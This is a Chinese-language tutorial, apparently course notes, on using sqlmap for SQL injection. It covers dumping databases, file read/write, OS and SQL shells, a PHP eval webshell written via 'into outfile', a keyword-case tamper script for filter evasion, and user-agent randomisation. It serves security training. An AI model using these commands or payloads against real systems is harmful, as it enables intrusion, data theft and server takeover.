Day46:WEB攻防-注入工具&SQLMAP&Tamper编写&指纹修改&高权限操作&目录架构

目录

数据猜解-库表列数据&字典

权限操作-文件&命令&交互式

提交方法-POST&HEAD&JSON

绕过模块-Tamper脚本-使用&开发

分析拓展-代理&调试&指纹&风险&等级


知识点:
1、注入工具-SQLMAP-常规猜解&字典配置

2、注入工具-SQLMAP-权限操作&文件命令

3、注入工具-SQLMAP-Tamper&使用&开发

4、注入工具-SQLMAP-调试指纹&风险等级

参考文章:https://www.cnblogs.com/bmjoker/p/9326258.html

数据猜解-库表列数据&字典

测试:http://vulnweb.com/

--current-db

--tables -D ""

--columns -T "" -D ""

--dump -C "" -C "" -T ""

权限操作-文件&命令&交互式

引出权限:
--is-dba --privileges

引出文件:

--file-read --file-write --file-dest

引出命令:

--os-cmd= --os-shell --sql-shell

测试:MYSQL高权限注入

查看权限是否是管理员:--is-dba

文件读写:--file-read(文件读取命令,相当于使用load_file函数)

这两个命令一般一起使用:

--file-write 写入本地文件

--file-dest 要写入的文件绝对路径

命令执行:--os-cmd= whoami(需要知道语言及网站绝对路径才行)

然后路径什么一路回车看结果就行

--os-shell(获取系统交互shell,需要知道语言及网站绝对路径才行)

选项默认回车就行

--sql-shell(执行数据库命令,必须要用到select,也可以配合into outfile函数)

select "<?php @eval($_POST1);?>" into outfile "xxx/you.php";

提交方法-POST&HEAD&JSON

Post方式注入:--data ""

Cookie方式注入:--cookie ""

Json方式注入:-r 1.txt (推荐,该方法通杀全部提交方式)在txt里要注入的地方加上*号就是告诉工具在这里注入,不加*就是让工具对整个数据包参数进行测试

绕过模块-Tamper脚本-使用&开发

测试:base64注入 有过滤的注入

python 复制代码
--tamper=test.py  //简单绕过脚本
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.LOW
def dependencies():
    pass
def tamper(payload, **kwargs):
    if payload:      
        payload = payload.replace('SELECT','sElEct')
        payload = payload.replace('OR','Or')
        payload = payload.replace('AND','And')
        payload = payload.replace('SLEEP','SleeP')
        payload = payload.replace('ELT','Elt')
    return payload

分析拓展-代理&调试&指纹&风险&等级

后期分析调试

-v=(0-6) #详细的等级(0-6)

--proxy "http://xx:xx" #代理注入

打乱默认指纹

python 复制代码
--user-agent ""  #自定义user-agent
--random-agent   #随机user-agent
--delay (设定两个HTTP请求的间隔时间,默认是没有任何间隔)

使用更多的测试

测试Header注入

python 复制代码
--level=(1-5) #要执行的测试水平等级(测试深度),默认为1 
--risk=(0-3)  #测试执行的风险等级,默认为1 
相关推荐
treesforest14 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
上海云盾第一敬业销售14 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
zhengfei61114 天前
小白级手册——全面剖析红队信息收集思考
网络·安全·web安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
顾凌陵14 天前
Web安全二阶段综合测试:知识点速查与实战技巧
安全·web安全
Chengbei1114 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
AI784015 天前
安全左移:网络安全从“亡羊补牢”走向“未雨绸缪”
网络·安全·web安全